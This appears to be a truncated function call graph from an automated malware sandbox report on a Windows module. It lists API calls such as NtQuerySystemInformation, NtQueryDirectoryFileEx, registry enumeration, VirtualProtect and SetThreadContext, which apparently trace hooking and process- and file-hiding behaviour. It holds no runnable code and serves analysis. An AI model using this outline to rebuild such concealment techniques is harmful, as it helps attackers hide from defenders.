8199->8200 8201 2d6f15124e9 StrCpyW 8200->8201 8202 2d6f15124fd 8200->8202 8206 2d6f151250a 8201->8206 8203 2d6f15119d8 4 API calls 8202->8203 8203->8206 8204 2d6f1513c74 StrCmpNIW 8204->8206 8205 2d6f151330c 4 API calls 8205->8206 8206->8198 8206->8204 8206->8205 8207 2d6f1511cd8 2 API calls 8206->8207 8207->8206 8208 2d6f151c9fc 8209 2d6f151db74 __free_lconv_mon 11 API calls 8208->8209 8210 2d6f151ca0c 8209->8210 8211 2d6f151db74 __free_lconv_mon 11 API calls 8210->8211 8212 2d6f151ca20 8211->8212 8213 2d6f151db74 __free_lconv_mon 11 API calls 8212->8213 8214 2d6f151ca34 8213->8214 8215 2d6f151db74 __free_lconv_mon 11 API calls 8214->8215 8216 2d6f151ca48 8215->8216 7979 2d6f151597d 7981 2d6f1515984 7979->7981 7980 2d6f15159eb 7981->7980 7982 2d6f1515a67 VirtualProtect 7981->7982 7983 2d6f1515aa1 7982->7983 7984 2d6f1515a93 GetLastError 7982->7984 7984->7983 8742 2d6f151fe80 8753 2d6f151cdcc EnterCriticalSection 8742->8753 8754 2d6f1525081 __scrt_dllmain_exception_filter 7985 2d6f151cd84 7986 2d6f151cd8c 7985->7986 7988 2d6f151cdbd 7986->7988 7990 2d6f151cdb9 7986->7990 7991 2d6f151fa3c 7986->7991 7996 2d6f151cde8 7988->7996 8000 2d6f151f7c4 7991->8000 7994 2d6f151fa77 7994->7986 7995 2d6f151fa91 InitializeCriticalSectionAndSpinCount 7995->7994 7997 2d6f151ce13 7996->7997 7998 2d6f151cdf6 DeleteCriticalSection 7997->7998 7999 2d6f151ce17 7997->7999 7998->7997 7999->7990 8001 2d6f151f821 8000->8001 8007 2d6f151f81c __vcrt_FlsAlloc 8000->8007 8001->7994 8001->7995 8002 2d6f151f851 LoadLibraryExW 8003 2d6f151f926 8002->8003 8004 2d6f151f876 GetLastError 8002->8004 8005 2d6f151f946 GetProcAddress 8003->8005 8006 2d6f151f93d FreeLibrary 8003->8006 8004->8007 8005->8001 8006->8005 8007->8001 8007->8002 8007->8005 8008 2d6f151f8b0 LoadLibraryExW 8007->8008 8008->8003 8008->8007 8755 2d6f151f484 GetCommandLineA GetCommandLineW 7639 2d6f1512604 NtQueryDirectoryFileEx 7640 2d6f151268e _invalid_parameter_noinfo 7639->7640 7653 2d6f1512872 7639->7653 7641 2d6f15126e5 GetFileType 7640->7641 7640->7653 7642 2d6f1512709 7641->7642 7643 2d6f15126f3 StrCpyW 7641->7643 7655 2d6f15119d8 GetFinalPathNameByHandleW 7642->7655 7644 2d6f1512718 7643->7644 7648 2d6f1512722 7644->7648 7652 2d6f15127c7 7644->7652 7647 2d6f1513c74 StrCmpNIW 7647->7652 7648->7653 7660 2d6f1513c74 7648->7660 7663 2d6f151330c StrCmpIW 7648->7663 7667 2d6f1511cd8 7648->7667 7651 2d6f151330c 4 API calls 7651->7652 7652->7647 7652->7651 7652->7653 7654 2d6f1511cd8 2 API calls 7652->7654 7654->7652 7656 2d6f1511a41 7655->7656 7657 2d6f1511a02 StrCmpNIW 7655->7657 7656->7644 7657->7656 7658 2d6f1511a1c lstrlenW 7657->7658 7658->7656 7659 2d6f1511a2e StrCpyW 7658->7659 7659->7656 7661 2d6f1513c96 7660->7661 7662 2d6f1513c81 StrCmpNIW 7660->7662 7661->7648 7662->7661 7664 2d6f151333e StrCpyW StrCatW 7663->7664 7665 2d6f1513355 PathCombineW 7663->7665 7666 2d6f151335e 7664->7666 7665->7666 7666->7648 7668 2d6f1511cef 7667->7668 7670 2d6f1511cf8 7667->7670 7669 2d6f151152c 2 API calls 7668->7669 7669->7670 7670->7648 8217 2d6f151b1a8 8218 2d6f151b1d5 __except_validate_context_record 8217->8218 8219 2d6f1519a64 _CreateFrameInfo 9 API calls 8218->8219 8220 2d6f151b1da 8219->8220 8223 2d6f151b234 8220->8223 8224 2d6f151b2c2 8220->8224 8231 2d6f151b288 8220->8231 8221 2d6f151b330 8221->8231 8259 2d6f151a974 8221->8259 8222 2d6f151b2af 8246 2d6f1519d10 8222->8246 8223->8222 8223->8231 8232 2d6f151b256 __GetCurrentState 8223->8232 8228 2d6f151b2e1 8224->8228 8253 2d6f151a114 8224->8253 8228->8221 8228->8231 8256 2d6f151a128 8228->8256 8229 2d6f151b3d9 8232->8229 8234 2d6f151b6b8 8232->8234 8235 2d6f151a114 Is_bad_exception_allowed 9 API calls 8234->8235 8236 2d6f151b6e7 __GetCurrentState 8235->8236 8237 2d6f1519a64 _CreateFrameInfo 9 API calls 8236->8237 8242 2d6f151b704 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8237->8242 8238 2d6f151b7fb 8239 2d6f1519a64 _CreateFrameInfo 9 API calls 8238->8239 8240 2d6f151b800 8239->8240 8241 2d6f1519a64 _CreateFrameInfo 9 API calls 8240->8241 8243 2d6f151b80b __FrameHandler3::GetHandlerSearchState 8240->8243 8241->8243 8242->8238 8242->8243 8244 2d6f151a114 9 API calls Is_bad_exception_allowed 8242->8244 8316 2d6f151a13c 8242->8316 8243->8231 8244->8242 8319 2d6f1519d74 8246->8319 8248 2d6f1519d2f __FrameHandler3::ExecutionInCatch 8323 2d6f1519c80 8248->8323 8251 2d6f151b6b8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8252 2d6f1519d64 8251->8252 8252->8231 8254 2d6f1519a64 _CreateFrameInfo 9 API calls 8253->8254 8255 2d6f151a11d 8254->8255 8255->8228 8257 2d6f1519a64 _CreateFrameInfo 9 API calls 8256->8257 8258 2d6f151a131 8257->8258 8258->8221 8327 2d6f151b844 8259->8327 8261 2d6f151ae42 8262 2d6f151ad93 8262->8261 8302 2d6f151ad91 8262->8302 8380 2d6f151ae4c 8262->8380 8263 2d6f151aabb 8263->8262 8307 2d6f151aaf3 8263->8307 8264 2d6f1519a64 _CreateFrameInfo 9 API calls 8269 2d6f151add5 8264->8269 8267 2d6f1519a64 _CreateFrameInfo 9 API calls 8268 2d6f151aa22 8267->8268 8268->8269 8273 2d6f1519a64 _CreateFrameInfo 9 API calls 8268->8273 8269->8261 8271 2d6f1517d70 _log10_special 8 API calls 8269->8271 8270 2d6f151acc4 8272 2d6f151ace1 8270->8272 8275 2d6f151a114 Is_bad_exception_allowed 9 API calls 8270->8275 8270->8302 8274 2d6f151ade8 8271->8274 8278 2d6f151ad03 8272->8278 8272->8302 8373 2d6f1519ce4 8272->8373 8277 2d6f151aa32 8273->8277 8274->8231 8275->8272 8279 2d6f1519a64 _CreateFrameInfo 9 API calls 8277->8279 8280 2d6f151ad19 8278->8280 8281 2d6f151ae25 8278->8281 8278->8302 8282 2d6f151aa3b 8279->8282 8283 2d6f151ad24 8280->8283 8287 2d6f151a114 Is_bad_exception_allowed 9 API calls 8280->8287 8284 2d6f1519a64 _CreateFrameInfo 9 API calls 8281->8284 8338 2d6f151a154 8282->8338 8291 2d6f151b8dc 9 API calls 8283->8291 8288 2d6f151ae2b 8284->8288 8286 2d6f151a128 9 API calls 8286->8307 8287->8283 8290 2d6f1519a64 _CreateFrameInfo 9 API calls 8288->8290 8292 2d6f151ae34 8290->8292 8293 2d6f151ad3b 8291->8293 8295 2d6f151cad8 23 API calls 8292->8295 8297 2d6f1519d74 __GetUnwindTryBlock RtlLookupFunctionEntry 8293->8297 8293->8302 8294 2d6f1519a64 _CreateFrameInfo 9 API calls 8296 2d6f151aa7d 8294->8296 8295->8261 8296->8263 8299 2d6f1519a64 _CreateFrameInfo 9 API calls 8296->8299 8298 2d6f151ad55 8297->8298 8377 2d6f1519f80 RtlUnwindEx 8298->8377 8300 2d6f151aa89 8299->8300 8303 2d6f1519a64 _CreateFrameInfo 9 API calls 8300->8303 8302->8264 8305 2d6f151aa92 8303->8305 8341 2d6f151b8dc 8305->8341 8307->8270 8307->8286 8352 2d6f151b068 8307->8352 8366 2d6f151a8a0 8307->8366 8310 2d6f151aaa6 8348 2d6f151b9cc 8310->8348 8312 2d6f151ae1f 8397 2d6f151cad8 8312->8397 8314 2d6f151aaae __CxxCallCatchBlock std::bad_alloc::bad_alloc 8314->8312 8392 2d6f15198d0 8314->8392 8317 2d6f1519a64 _CreateFrameInfo 9 API calls 8316->8317 8318 2d6f151a14a 8317->8318 8318->8242 8322 2d6f1519da2 __FrameHandler3::ExecutionInCatch 8319->8322 8320 2d6f1519e12 8320->8248 8321 2d6f1519dce RtlLookupFunctionEntry 8321->8322 8322->8320 8322->8321 8325 2d6f1519c9e 8323->8325 8324 2d6f1519ccb 8324->8251 8325->8324 8326 2d6f1519a64 _CreateFrameInfo 9 API calls 8325->8326 8326->8325 8328 2d6f151b869 __FrameHandler3::ExecutionInCatch 8327->8328 8329 2d6f1519d74 __GetUnwindTryBlock RtlLookupFunctionEntry 8328->8329 8330 2d6f151b87e 8329->8330 8400 2d6f151a4fc 8330->8400 8333 2d6f151b890 __FrameHandler3::GetHandlerSearchState 8403 2d6f151a534 8333->8403 8334 2d6f151b8b3 8335 2d6f151a4fc __GetUnwindTryBlock RtlLookupFunctionEntry 8334->8335 8336 2d6f151a9d6 8335->8336 8336->8261 8336->8263 8336->8267 8339 2d6f1519a64 _CreateFrameInfo 9 API calls 8338->8339 8340 2d6f151a162 8339->8340 8340->8261 8340->8294 8342 2d6f151b9c3 8341->8342 8347 2d6f151b907 8341->8347 8343 2d6f151aaa2 8343->8263 8343->8310 8344 2d6f151a128 9 API calls 8344->8347 8345 2d6f151a114 Is_bad_exception_allowed 9 API calls 8345->8347 8346 2d6f151b068 9 API calls 8346->8347 8347->8343 8347->8344 8347->8345 8347->8346 8349 2d6f151ba39 8348->8349 8351 2d6f151b9e9 Is_bad_exception_allowed 8348->8351 8349->8314 8350 2d6f151a114 9 API calls Is_bad_exception_allowed 8350->8351 8351->8349 8351->8350 8353 2d6f151b095 8352->8353 8364 2d6f151b124 8352->8364 8354 2d6f151a114 Is_bad_exception_allowed 9 API calls 8353->8354 8355 2d6f151b09e 8354->8355 8356 2d6f151a114 Is_bad_exception_allowed 9 API calls 8355->8356 8357 2d6f151b0b7 8355->8357 8355->8364 8356->8357 8358 2d6f151b0e3 8357->8358 8359 2d6f151a114 Is_bad_exception_allowed 9 API calls 8357->8359 8357->8364 8360 2d6f151a128 9 API calls 8358->8360 8359->8358 8361 2d6f151b0f7 8360->8361 8362 2d6f151b110 8361->8362 8363 2d6f151a114 Is_bad_exception_allowed 9 API calls 8361->8363 8361->8364 8365 2d6f151a128 9 API calls 8362->8365 8363->8362 8364->8307 8365->8364 8367 2d6f1519d74 __GetUnwindTryBlock RtlLookupFunctionEntry 8366->8367 8368 2d6f151a8dd 8367->8368 8369 2d6f151a114 Is_bad_exception_allowed 9 API calls 8368->8369 8370 2d6f151a915 8369->8370 8371 2d6f1519f80 9 API calls 8370->8371 8372 2d6f151a959 8371->8372 8372->8307 8374 2d6f1519cf8 __FrameHandler3::ExecutionInCatch 8373->8374 8375 2d6f1519c80 __FrameHandler3::ExecutionInCatch 9 API calls 8374->8375 8376 2d6f1519d02 8375->8376 8376->8278 8378 2d6f1517d70 _log10_special 8 API calls 8377->8378 8379 2d6f151a07a 8378->8379 8379->8302 8381 2d6f151ae82 8380->8381 8386 2d6f151aef0 8380->8386 8382 2d6f1519a64 _CreateFrameInfo 9 API calls 8381->8382 8383 2d6f151ae87 8382->8383 8384 2d6f151ae96 EncodePointer 8383->8384 8390 2d6f151aeec 8383->8390 8385 2d6f1519a64 _CreateFrameInfo 9 API calls 8384->8385 8387 2d6f151aea6 8385->8387 8386->8302 8387->8390 8406 2d6f1519c2c 8387->8406 8389 2d6f151a8a0 19 API calls 8389->8390 8390->8386 8390->8389 8391 2d6f151a114 9 API calls Is_bad_exception_allowed 8390->8391 8391->8390 8393 2d6f15198ef 8392->8393 8394 2d6f1519918 RtlPcToFileHeader 8393->8394 8395 2d6f151993a RaiseException 8393->8395 8396 2d6f1519930 8394->8396 8395->8312 8396->8395 8398 2d6f151d258 _invalid_parameter_noinfo 23 API calls 8397->8398 8399 2d6f151cae1 8398->8399 8401 2d6f1519d74 __GetUnwindTryBlock RtlLookupFunctionEntry 8400->8401 8402 2d6f151a50f 8401->8402 8402->8333 8402->8334 8404 2d6f1519d74 __GetUnwindTryBlock RtlLookupFunctionEntry 8403->8404 8405 2d6f151a54e 8404->8405 8405->8336 8407 2d6f1519a64 _CreateFrameInfo 9 API calls 8406->8407 8408 2d6f1519c58 8407->8408 8408->8390 8009 2d6f151f72c 8010 2d6f151f76b 8009->8010 8011 2d6f151f74e 8009->8011 8013 2d6f151f775 8010->8013 8018 2d6f1521ee8 8010->8018 8011->8010 8012 2d6f151f75c 8011->8012 8014 2d6f151dadc __free_lconv_mon 11 API calls 8012->8014 8025 2d6f1521f24 8013->8025 8017 2d6f151f761 _invalid_parameter_noinfo 8014->8017 8019 2d6f1521f0a HeapSize 8018->8019 8020 2d6f1521ef1 8018->8020 8021 2d6f151dadc __free_lconv_mon 11 API calls 8020->8021 8022 2d6f1521ef6 8021->8022 8023 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 8022->8023 8024 2d6f1521f01 8023->8024 8024->8013 8026 2d6f1521f39 8025->8026 8027 2d6f1521f43 8025->8027 8037 2d6f151ce3c 8026->8037 8029 2d6f1521f48 8027->8029 8035 2d6f1521f4f __free_lconv_mon 8027->8035 8030 2d6f151db74 __free_lconv_mon 11 API calls 8029->8030 8033 2d6f1521f41 8030->8033 8031 2d6f1521f55 8034 2d6f151dadc __free_lconv_mon 11 API calls 8031->8034 8032 2d6f1521f82 HeapReAlloc 8032->8033 8032->8035 8033->8017 8034->8033 8035->8031 8035->8032 8036 2d6f151bc8c __free_lconv_mon 2 API calls 8035->8036 8036->8035 8038 2d6f151ce87 8037->8038 8039 2d6f151ce4b __free_lconv_mon 8037->8039 8041 2d6f151dadc __free_lconv_mon 11 API calls 8038->8041 8039->8038 8040 2d6f151ce6e HeapAlloc 8039->8040 8043 2d6f151bc8c __free_lconv_mon 2 API calls 8039->8043 8040->8039 8042 2d6f151ce85 8040->8042 8041->8042 8042->8033 8043->8039 8756 2d6f152522d 8757 2d6f151a0c0 __CxxCallCatchBlock 9 API calls 8756->8757 8761 2d6f1525240 8757->8761 8758 2d6f152527f __CxxCallCatchBlock 8759 2d6f1519a64 _CreateFrameInfo 9 API calls 8758->8759 8760 2d6f1525293 8759->8760 8762 2d6f1519a64 _CreateFrameInfo 9 API calls 8760->8762 8761->8758 8764 2d6f1519750 __CxxCallCatchBlock 9 API calls 8761->8764 8763 2d6f15252a3 8762->8763 8764->8758 8409 2d6f1512fac 8410 2d6f1512fd3 8409->8410 8411 2d6f15130a0 8410->8411 8412 2d6f1512ff0 PdhGetCounterInfoW 8410->8412 8412->8411 8413 2d6f1513012 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8412->8413 8414 2d6f151308c GetProcessHeap HeapFree 8413->8414 8415 2d6f1513044 StrCmpW 8413->8415 8414->8411 8415->8414 8417 2d6f1513059 8415->8417 8417->8414 8418 2d6f1513554 StrCmpNW 8417->8418 8419 2d6f1513586 StrStrW 8418->8419 8422 2d6f15135f6 8418->8422 8420 2d6f151359f StrToIntW 8419->8420 8419->8422 8421 2d6f15135c7 8420->8421 8420->8422 8421->8422 8428 2d6f1511934 OpenProcess 8421->8428 8422->8417 8425 2d6f1513c74 StrCmpNIW 8426 2d6f15135e8 8425->8426 8426->8422 8427 2d6f1511c00 2 API calls 8426->8427 8427->8422 8429 2d6f1511968 K32GetModuleFileNameExW 8428->8429 8430 2d6f15119ba 8428->8430 8431 2d6f15119b1 CloseHandle 8429->8431 8432 2d6f1511982 PathFindFileNameW lstrlenW 8429->8432 8430->8422 8430->8425 8431->8430 8432->8431 8433 2d6f15119a0 StrCpyW 8432->8433 8433->8431 8044 2d6f1512334 GetProcessIdOfThread GetCurrentProcessId 8045 2d6f15123da 8044->8045 8046 2d6f151235f CreateFileW 8044->8046 8046->8045 8047 2d6f1512393 WriteFile ReadFile CloseHandle 8046->8047 8047->8045 9101 2d6f15252b3 9104 2d6f15197a4 9101->9104 9105 2d6f15197bc 9104->9105 9106 2d6f15197ce 9104->9106 9105->9106 9107 2d6f15197c4 9105->9107 9108 2d6f1519a64 _CreateFrameInfo 9 API calls 9106->9108 9109 2d6f15197cc 9107->9109 9111 2d6f1519a64 _CreateFrameInfo 9 API calls 9107->9111 9110 2d6f15197d3 9108->9110 9110->9109 9113 2d6f1519a64 _CreateFrameInfo 9 API calls 9110->9113 9112 2d6f15197f3 9111->9112 9114 2d6f1519a64 _CreateFrameInfo 9 API calls 9112->9114 9113->9109 9115 2d6f1519800 9114->9115 9116 2d6f151cad8 23 API calls 9115->9116 9117 2d6f1519809 9116->9117 9118 2d6f151cad8 23 API calls 9117->9118 9119 2d6f1519815 9118->9119 9120 2d6f1520698 9121 2d6f15206c2 9120->9121 9122 2d6f151dafc __free_lconv_mon 11 API calls 9121->9122 9123 2d6f15206e1 9122->9123 9124 2d6f151db74 __free_lconv_mon 11 API calls 9123->9124 9125 2d6f15206ef 9124->9125 9126 2d6f151dafc __free_lconv_mon 11 API calls 9125->9126 9129 2d6f1520719 9125->9129 9128 2d6f152070b 9126->9128 9127 2d6f151fa3c 6 API calls 9127->9129 9130 2d6f151db74 __free_lconv_mon 11 API calls 9128->9130 9129->9127 9131 2d6f1520722 9129->9131 9130->9129 8765 2d6f151fc1c 8766 2d6f151fc55 8765->8766 8768 2d6f151fc26 8765->8768 8767 2d6f151fc3b FreeLibrary 8767->8768 8768->8766 8768->8767 7609 2d6f151211c NtQuerySystemInformation 7610 2d6f1512158 7609->7610 7611 2d6f151222e 7610->7611 7612 2d6f1512263 7610->7612 7620 2d6f1512171 7610->7620 7613 2d6f15122d7 7612->7613 7614 2d6f1512268 7612->7614 7613->7611 7616 2d6f15122dc 7613->7616 7629 2d6f15131cc GetProcessHeap HeapAlloc 7614->7629 7617 2d6f15131cc 11 API calls 7616->7617 7621 2d6f1512280 7617->7621 7618 2d6f15121a9 StrCmpNIW 7618->7620 7619 2d6f15121d0 7619->7620 7623 2d6f1511c34 7619->7623 7620->7611 7620->7618 7620->7619 7621->7611 7624 2d6f1511cb8 7623->7624 7625 2d6f1511c5b GetProcessHeap HeapAlloc 7623->7625 7624->7619 7625->7624 7626 2d6f1511c96 7625->7626 7635 2d6f1511c00 7626->7635 7633 2d6f151321f 7629->7633 7630 2d6f15132dd GetProcessHeap HeapFree 7630->7621 7631 2d6f15132d8 7631->7630 7632 2d6f151326a StrCmpNIW 7632->7633 7633->7630 7633->7631 7633->7632 7634 2d6f1511c34 6 API calls 7633->7634 7634->7633 7636 2d6f1511c17 7635->7636 7637 2d6f1511c20 GetProcessHeap HeapFree 7635->7637 7638 2d6f151152c 2 API calls 7636->7638 7637->7624 7638->7637 8769 2d6f1520020 8772 2d6f151ffd8 8769->8772 8777 2d6f151cdcc EnterCriticalSection 8772->8777 8434 2d6f151bfa1 8435 2d6f151cad8 23 API calls 8434->8435 8436 2d6f151bfa6 8435->8436 8437 2d6f151c017 8436->8437 8438 2d6f151bfcd GetModuleHandleW 8436->8438 8451 2d6f151bea4 8437->8451 8438->8437 8444 2d6f151bfda 8438->8444 8444->8437 8446 2d6f151c0c8 GetModuleHandleExW 8444->8446 8447 2d6f151c0fc GetProcAddress 8446->8447 8448 2d6f151c10e 8446->8448 8447->8448 8449 2d6f151c12a FreeLibrary 8448->8449 8450 2d6f151c131 8448->8450 8449->8450 8450->8437 8465 2d6f151cdcc EnterCriticalSection 8451->8465 8059 2d6f1516120 8060 2d6f151612d 8059->8060 8061 2d6f1516139 8060->8061 8062 2d6f151624a 8060->8062 8063 2d6f15161bd 8061->8063 8064 2d6f1516196 SetThreadContext 8061->8064 8065 2d6f151632e 8062->8065 8066 2d6f1516271 VirtualProtect FlushInstructionCache 8062->8066 8064->8063 8067 2d6f151634e 8065->8067 8075 2d6f1514810 8065->8075 8066->8062 8079 2d6f1515220 GetCurrentProcess 8067->8079 8070 2d6f15163a7 8073 2d6f1517d70 _log10_special 8 API calls 8070->8073 8071 2d6f1516367 ResumeThread 8072 2d6f1516353 8071->8072 8072->8070 8072->8071 8074 2d6f15163ef 8073->8074 8077 2d6f151482c 8075->8077 8076 2d6f151488f 8076->8067 8077->8076 8078 2d6f1514842 VirtualFree 8077->8078 8078->8077 8080 2d6f151523c 8079->8080 8081 2d6f1515283 8080->8081 8082 2d6f1515252 VirtualProtect FlushInstructionCache 8080->8082 8081->8072 8082->8080 8476 2d6f15241c8 8477 2d6f15241d9 CloseHandle 8476->8477 8478 2d6f15241df 8476->8478 8477->8478 9132 2d6f15252c9 9133 2d6f1519a64 _CreateFrameInfo 9 API calls 9132->9133 9134 2d6f15252d7 9133->9134 9135 2d6f15252e2 9134->9135 9136 2d6f1519a64 _CreateFrameInfo 9 API calls 9134->9136 9136->9135 7504 2d6f1511ac8 7511 2d6f1511628 GetProcessHeap HeapAlloc 7504->7511 7506 2d6f1511ad7 7507 2d6f1511ade SleepEx 7506->7507 7510 2d6f1511598 StrCmpIW StrCmpW 7506->7510 7562 2d6f15118b4 7506->7562 7508 2d6f1511628 50 API calls 7507->7508 7508->7506 7510->7506 7579 2d6f1511268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7511->7579 7513 2d6f1511650 7580 2d6f1511000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7513->7580 7515 2d6f1511658 7581 2d6f1511268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7515->7581 7517 2d6f1511661 7582 2d6f1511268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7517->7582 7519 2d6f151166a 7583 2d6f1511268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7519->7583 7521 2d6f1511673 7584 2d6f1511000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7521->7584 7523 2d6f151167c 7585 2d6f1511000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7523->7585 7525 2d6f1511685 7586 2d6f1511000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7525->7586 7527 2d6f151168e RegOpenKeyExW 7528 2d6f15118a6 7527->7528 7529 2d6f15116c0 RegOpenKeyExW 7527->7529 7528->7506 7530 2d6f15116e9 7529->7530 7531 2d6f15116ff RegOpenKeyExW 7529->7531 7587 2d6f15112bc RegQueryInfoKeyW 7530->7587 7533 2d6f151173a RegOpenKeyExW 7531->7533 7534 2d6f1511723 7531->7534 7537 2d6f151175e 7533->7537 7538 2d6f1511775 RegOpenKeyExW 7533->7538 7596 2d6f151104c RegQueryInfoKeyW 7534->7596 7540 2d6f15112bc 16 API calls 7537->7540 7541 2d6f1511799 7538->7541 7542 2d6f15117b0 RegOpenKeyExW 7538->7542 7545 2d6f151176b RegCloseKey 7540->7545 7546 2d6f15112bc 16 API calls 7541->7546 7543 2d6f15117eb RegOpenKeyExW 7542->7543 7544 2d6f15117d4 7542->7544 7548 2d6f1511826 RegOpenKeyExW 7543->7548 7549 2d6f151180f 7543->7549 7547 2d6f15112bc 16 API calls 7544->7547 7545->7538 7550 2d6f15117a6 RegCloseKey 7546->7550 7551 2d6f15117e1 RegCloseKey 7547->7551 7553 2d6f151184a 7548->7553 7554 2d6f1511861 RegOpenKeyExW 7548->7554 7552 2d6f151104c 6 API calls 7549->7552 7550->7542 7551->7543 7555 2d6f151181c RegCloseKey 7552->7555 7556 2d6f151104c 6 API calls 7553->7556 7557 2d6f151189c RegCloseKey 7554->7557 7558 2d6f1511885 7554->7558 7555->7548 7559 2d6f1511857 RegCloseKey 7556->7559 7557->7528 7560 2d6f151104c 6 API calls 7558->7560 7559->7554 7561 2d6f1511892 RegCloseKey 7560->7561 7561->7557 7606 2d6f15114a4 7562->7606 7579->7513 7580->7515 7581->7517 7582->7519 7583->7521 7584->7523 7585->7525 7586->7527 7588 2d6f1511327 GetProcessHeap HeapAlloc 7587->7588 7589 2d6f151148a RegCloseKey 7587->7589 7590 2d6f1511476 GetProcessHeap HeapFree 7588->7590 7591 2d6f1511352 RegEnumValueW 7588->7591 7589->7531 7590->7589 7592 2d6f15113a5 7591->7592 7592->7590 7592->7591 7594 2d6f151141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 7592->7594 7595 2d6f15113d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7592->7595 7601 2d6f151152c 7592->7601 7594->7592 7595->7594 7597 2d6f15111b5 RegCloseKey 7596->7597 7599 2d6f15110bf 7596->7599 7597->7533 7598 2d6f15110cf RegEnumValueW 7598->7599 7599->7597 7599->7598 7600 2d6f151114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7599->7600 7600->7599 7602 2d6f1511546 7601->7602 7605 2d6f151157c 7601->7605 7603 2d6f151155d StrCmpIW 7602->7603 7604 2d6f1511565 StrCmpW 7602->7604 7602->7605 7603->7602 7604->7602 7605->7592 7607 2d6f15114e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 7606->7607 7608 2d6f15114c1 GetProcessHeap HeapFree 7606->7608 7608->7607 7608->7608 9137 2d6f151decc 9138 2d6f151def1 9137->9138 9147 2d6f151df08 9137->9147 9139 2d6f151dadc __free_lconv_mon 11 API calls 9138->9139 9140 2d6f151def6 9139->9140 9142 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 9140->9142 9141 2d6f151dfc0 9191 2d6f151c32c 9141->9191 9144 2d6f151df01 9142->9144 9146 2d6f151e020 9150 2d6f151db74 __free_lconv_mon 11 API calls 9146->9150 9147->9141 9151 2d6f151df55 9147->9151 9153 2d6f151df98 9147->9153 9169 2d6f151e110 9147->9169 9149 2d6f151e0b1 9154 2d6f151db74 __free_lconv_mon 11 API calls 9149->9154 9152 2d6f151e027 9150->9152 9155 2d6f151df78 9151->9155 9158 2d6f151db74 __free_lconv_mon 11 API calls 9151->9158 9152->9155 9159 2d6f151db74 __free_lconv_mon 11 API calls 9152->9159 9153->9155 9160 2d6f151db74 __free_lconv_mon 11 API calls 9153->9160 9157 2d6f151e0bc 9154->9157 9162 2d6f151db74 __free_lconv_mon 11 API calls 9155->9162 9156 2d6f151e052 9156->9149 9156->9156 9166 2d6f151e0f7 9156->9166 9197 2d6f1521380 9156->9197 9161 2d6f151e0d5 9157->9161 9165 2d6f151db74 __free_lconv_mon 11 API calls 9157->9165 9158->9151 9159->9152 9160->9153 9163 2d6f151db74 __free_lconv_mon 11 API calls 9161->9163 9162->9144 9163->9144 9165->9157 9167 2d6f151d9c0 _invalid_parameter_noinfo 17 API calls 9166->9167 9168 2d6f151e10c 9167->9168 9170 2d6f151e13e 9169->9170 9170->9170 9171 2d6f151dafc __free_lconv_mon 11 API calls 9170->9171 9172 2d6f151e189 9171->9172 9173 2d6f1521380 49 API calls 9172->9173 9174 2d6f151e1bf 9173->9174 9175 2d6f151d9c0 _invalid_parameter_noinfo 17 API calls 9174->9175 9176 2d6f151e293 9175->9176 9177 2d6f151e5e4 23 API calls 9176->9177 9178 2d6f151e376 9177->9178 9206 2d6f151f9d8 9178->9206 9183 2d6f151e43d 9184 2d6f151e5e4 23 API calls 9183->9184 9185 2d6f151e46d 9184->9185 9186 2d6f151f9d8 5 API calls 9185->9186 9187 2d6f151e496 9186->9187 9231 2d6f151dd40 9187->9231 9190 2d6f151e110 59 API calls 9192 2d6f151c344 9191->9192 9196 2d6f151c37c 9191->9196 9193 2d6f151dafc __free_lconv_mon 11 API calls 9192->9193 9192->9196 9194 2d6f151c372 9193->9194 9195 2d6f151db74 __free_lconv_mon 11 API calls 9194->9195 9195->9196 9196->9146 9196->9156 9200 2d6f152139d 9197->9200 9198 2d6f15213a2 9199 2d6f151dadc __free_lconv_mon 11 API calls 9198->9199 9203 2d6f15213b8 9198->9203 9205 2d6f15213ac 9199->9205 9200->9198 9202 2d6f15213ec 9200->9202 9200->9203 9201 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 9201->9203 9202->9203 9204 2d6f151dadc __free_lconv_mon 11 API calls 9202->9204 9203->9156 9204->9205 9205->9201 9207 2d6f151f7c4 5 API calls 9206->9207 9208 2d6f151e3a1 9207->9208 9209 2d6f151dbc4 9208->9209 9210 2d6f151dbee 9209->9210 9211 2d6f151dc12 9209->9211 9215 2d6f151db74 __free_lconv_mon 11 API calls 9210->9215 9219 2d6f151dbfd FindFirstFileExW 9210->9219 9212 2d6f151dc17 9211->9212 9213 2d6f151dc6c 9211->9213 9216 2d6f151dc2c 9212->9216 9212->9219 9220 2d6f151db74 __free_lconv_mon 11 API calls 9212->9220 9214 2d6f151f4ac MultiByteToWideChar 9213->9214 9226 2d6f151dc88 9214->9226 9215->9219 9217 2d6f151ce3c 12 API calls 9216->9217 9217->9219 9218 2d6f151dc8f GetLastError 9253 2d6f151da50 9218->9253 9219->9183 9220->9216 9222 2d6f151dcca 9222->9219 9223 2d6f151f4ac MultiByteToWideChar 9222->9223 9228 2d6f151dd0e 9223->9228 9225 2d6f151dcbd 9227 2d6f151ce3c 12 API calls 9225->9227 9226->9218 9226->9222 9226->9225 9230 2d6f151db74 __free_lconv_mon 11 API calls 9226->9230 9227->9222 9228->9218 9228->9219 9229 2d6f151dadc __free_lconv_mon 11 API calls 9229->9219 9230->9225 9232 2d6f151dd8e 9231->9232 9235 2d6f151dd6a 9231->9235 9233 2d6f151dde8 9232->9233 9234 2d6f151dd94 9232->9234 9236 2d6f151f53c WideCharToMultiByte 9233->9236 9238 2d6f151dda9 9234->9238 9239 2d6f151dd79 9234->9239 9240 2d6f151db74 __free_lconv_mon 11 API calls 9234->9240 9237 2d6f151db74 __free_lconv_mon 11 API calls 9235->9237 9235->9239 9247 2d6f151de0c 9236->9247 9237->9239 9241 2d6f151ce3c 12 API 